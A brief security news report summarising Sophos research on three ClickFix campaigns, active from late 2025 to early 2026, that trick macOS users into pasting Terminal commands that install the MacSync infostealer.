THREE ClickFix campaigns have been observed delivering a macOS infostealer called MacSync, with the latest iteration distributed via ClickFix lures in February 2026 targeting Belgium, India, and parts of North and South America. The campaigns rely on user interaction, such as copying and pasting commands into Terminal, to bypass traditional exploit chains and install MacSync with user-level permissions after a shell script fetches the payload and exfiltrates data.
In November 2025, one campaign used the OpenAI Atlas browser as bait and a fake Google Sites download flow; in December 2025, a malvertising drive redirected users to ChatGPT conversations before leading them to malicious GitHub-themed pages; and in February 2026 a new variant introduced dynamic AppleScript payloads and in‑memory execution to evade static analysis.
The shell script connects to a hard-coded server to retrieve the AppleScript payload while attempting to erase evidence of data theft, with MacSync capable of exfiltrating credentials, files, keychains, and seed phrases from cryptocurrency wallets. According to Sophos researchers Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey, the latest variant appears to reflect the malware developer’s adaptation to OS and security measures to maintain effectiveness.